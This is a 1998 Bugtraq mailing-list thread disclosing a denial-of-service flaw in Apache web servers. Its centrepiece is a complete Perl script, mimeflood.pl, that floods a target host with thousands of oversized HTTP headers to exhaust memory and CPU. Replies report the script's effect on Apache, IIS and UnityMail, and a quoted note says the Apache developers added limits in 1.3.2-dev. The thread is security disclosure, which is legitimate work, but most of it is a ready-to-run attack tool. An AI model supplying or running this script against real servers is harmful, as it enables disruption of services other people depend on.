---------- Forwarded message ----------
From: Laurent FACQ (facq@U-BORDEAUX.FR)
To: BUGTRAQ@netspace.org
Date: Thu, 3 Sep 1998 12:34:22 +0200
Subject: Web servers / possible DOS Attack / mime header flooding
#! /bin/perl
# mimeflood.pl - 02/08/1998 - L.Facq (facq@u-bordeaux.fr)
# Web servers / possible DOS Attack / "mime header flooding"
#
# looking at the apache 1.2.5 source code i found
# that there was no limit on how many mime headers could
# be included in a client request. The only limits
# are : 8192 byte for each header, 300 sec. on reading headers.
#
# => by sending a crazy amount of 8000 bytes headers, it's possible
# to consume a lot of memory (and of course CPU). The point
# is that httpd daemons grow and STAY at this big size (or die
# if you send too much)
#
# -> may be a limit on mime header number could be added.
#
# -> may be other web server could be vulnerable to this problem.
#
# - i tried on an apache 1.2.5 -> it works
# - i didnt installed 1.3.1 but looking at the source code,
# i think the problem is there too.
#
##################################################
#From Roy T. Fielding / Sep 2 '98 at 12:57 pm -420
#
#[...]
#>
#> -> may be a limit on mime header number could be added.
#
#Such limits have already been added to 1.3.2-dev.
#
#.....Roy
use Socket;
# Usage : $0 host [port [max] ]
$max= 0;
if ($ARGV[2])
{
$max= $ARGV[2];
}
$proto = getprotobyname('tcp');
socket(Socket_Handle, PF_INET, SOCK_STREAM, $proto);
$port = 80;
if ($ARGV[1])
{
$port= $ARGV[1];
}
$host = $ARGV[0];
$sin = sockaddr_in($port,inet_aton($host));
connect(Socket_Handle,$sin);
send Socket_Handle,"GET / HTTP/1.0\n",0;
$val= ('z'x8000)."\n";
$n= 1;
$|= 1;
while (Socket_Handle)
{
send Socket_Handle,"Stupidheader$n: ",0;
send Socket_Handle,$val,0;
$n++;
if (!($n % 100))
{
print "$n\n";
}
if ($max && ($n > $max))
{
last;
}
}
print "Done: $n\n";
send Socket_Handle,"\n",0;
while ()
{
print $_;
}
From jericho@dimensional.com Mon Oct 19 15:07:54 1998
Date: Sun, 27 Sep 1998 15:09:51 -0600 (MDT)
From: mea culpa
To: root@repsec.com
Subject: Re: Web servers / possible DOS Attack / mime header flooding (fwd)
---------- Forwarded message ----------
From: Daniel Leeds
To: BUGTRAQ@netspace.org
Date: Thu, 3 Sep 1998 14:51:42 -0700
Subject: Re: Web servers / possible DOS Attack / mime header flooding
IIS on NT 4.0 sp3, and the stock windows 98 http server appear to be immune.
however some other 3rd party products appear vulnerable.
UnityMail 2.0 for 95/NT *IS* vulnerable to the DOS. CPU load forks to 100%,
the system is useable, however all access to the UnityMail administrative web
server is hung.
The above is probably not a huge deal, other than annoying mailing list admins
who want to access their lists via the web admin, but i think its probably
illustrative of a wider scope---> how many other administrative web interfaces,
commercial http servers, etc are vulnerable to this denial of service?
On 03-Sep-98
Rich Wood wrote:
> On 3 Sep 98, at 12:34, Laurent FACQ wrote:
>> # => by sending a crazy amount of 8000 bytes headers, it's possible
>> # to consume a lot of memory (and of course CPU). The point
>> # is that httpd daemons grow and STAY at this big size (or die
>> # if you send too much)
>
> Tried against apache 1.3.1 on FreeBSD 2.2.6 (DX2-66 16Mb), script hung
> after 2500 headers with apache using 30Mb.
>
> Tried against apache 1.3.1 on NT4 (workstation) SP3 (P200 64Mb), after
> 7500 headers, apache was using 120Mb RAM and the box ground to a halt.
>
> It didn't actually crash apache on either box, but severely reduced the
> usefulness of the systems.
>
> Rich
> --
> Rich Wood
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Daniel Leeds Systems Administrator
dleeds@dfacades.com DigitalFacades
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-